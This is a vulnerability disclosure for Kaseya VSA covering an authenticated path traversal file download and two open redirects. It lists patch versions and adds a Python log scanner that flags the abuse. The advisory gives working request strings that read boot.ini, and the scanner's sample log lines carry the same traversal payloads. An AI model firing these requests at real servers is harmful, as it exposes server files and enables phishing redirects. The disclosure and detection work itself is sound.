>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro ([email protected]), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 28/09/2015
>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show."
A special thanks to CERT and ZDI for assisting with the vulnerability reporting process.
These vulnerabilities were disclosed by CERT under ID 919604 [1] on 13/07/2015.
>> Technical details:
#1
Vulnerability: Arbitrary file download (authenticated)
CVE-2015-2862 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1
GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/
A valid login is needed, and the Referer header must be included. A sample request can be obtained by downloading any file attached to any ticket and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (<Kaseya_Install_Dir>\WebPages\), so two "../" segments resolve to the drive root.
#2
Vulnerability: Open redirect (unauthenticated)
CVE-2015-2863 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1
a)
http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com
b)
GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
Host: www.google.com
(the Host header must be set to the redirect target, here www.google.com)
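Both issues above leave a recognizable trace in the web server access log: a filepath parameter containing a parent-directory segment on Downloader.ashx, or an absolute URL in the urlToLoad / url parameter of supportLoad.asp and LocalProxy.ashx. The following scanner is an added example and not part of the original advisory or of Kaseya's code; the log lines are constructed for illustration and the field layout (date time cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)) is an assumed IIS W3C configuration. It decodes the parameter values (including double percent-encoding and backslash separators) before deciding, so that the encoded variants the raw request strings above do not show are also caught.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample IIS W3C log lines (not from the original advisory).
# Assumed fields: date time cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
SAMPLE_LOG = """\
2015-07-13 10:01:02 GET /vsaPres/web20/core/Downloader.ashx displayName=whatever&filepath=../../boot.ini 200 http://10.0.0.3/
2015-07-13 10:01:05 GET /vsaPres/web20/core/Downloader.ashx displayName=report.pdf&filepath=Attachments/report.pdf 200 http://10.0.0.3/
2015-07-13 10:02:11 GET /vsaPres/web20/core/Downloader.ashx displayName=x&filepath=..%2F..%2Fwindows%2Fwin.ini 200 http://10.0.0.3/
2015-07-13 10:03:30 GET /inc/supportLoad.asp urlToLoad=http://www.google.com 302 -
2015-07-13 10:03:45 GET /inc/supportLoad.asp urlToLoad=/inc/help.htm 200 -
2015-07-13 10:04:00 GET /vsaPres/Web20/core/LocalProxy.ashx url=http://www.google.com 200 -
"""

# Endpoint -> (parameter to inspect, kind of finding). Paths are compared
# lower-cased because IIS does not distinguish web20 from Web20.
WATCHED = {
    "/vsapres/web20/core/downloader.ashx": ("filepath", "path-traversal"),
    "/inc/supportload.asp": ("urltoload", "open-redirect"),
    "/vsapres/web20/core/localproxy.ashx": ("url", "open-redirect"),
}


def _decode(value: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times to catch double encoding."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def has_traversal(path: str) -> bool:
    """True if any path segment is '..' after decoding and slash normalization."""
    decoded = _decode(path).replace("\\", "/")
    return any(seg == ".." for seg in decoded.split("/"))


def is_external_url(value: str) -> bool:
    """True if the redirect/proxy target is absolute or protocol-relative."""
    decoded = _decode(value).strip()
    if decoded.startswith("//"):
        return True
    parts = urlsplit(decoded)
    return bool(parts.scheme) and bool(parts.netloc)


def scan_log(text: str) -> list:
    """Return one finding per log line whose watched parameter looks abusive."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 7:
            continue
        _date, _time, _method, stem, query, status, referer = fields[:7]
        watched = WATCHED.get(stem.lower())
        if watched is None:
            continue
        param, kind = watched
        # parse_qs already percent-decodes once; keys are lower-cased to match WATCHED.
        params = {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}
        for value in params.get(param, []):
            hit = has_traversal(value) if kind == "path-traversal" else is_external_url(value)
            if hit:
                findings.append({"line": lineno, "kind": kind, "endpoint": stem,
                                 "value": value, "status": status, "referer": referer})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['kind']} via {f['endpoint']} -> {f['value']} ({f['status']})")
```

A 200 on a traversal request is the case worth alerting on, since the download only succeeds for an authenticated session; the referer field tells you which logged-in user's session issued it. Relative urlToLoad values such as /inc/help.htm are left alone so legitimate in-product help links do not generate noise.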
>> Fix:
R9.1: install patch 9.1.0.4
R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29
>> References:
[1] https://www.kb.cert.org/vuls/id/919604
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/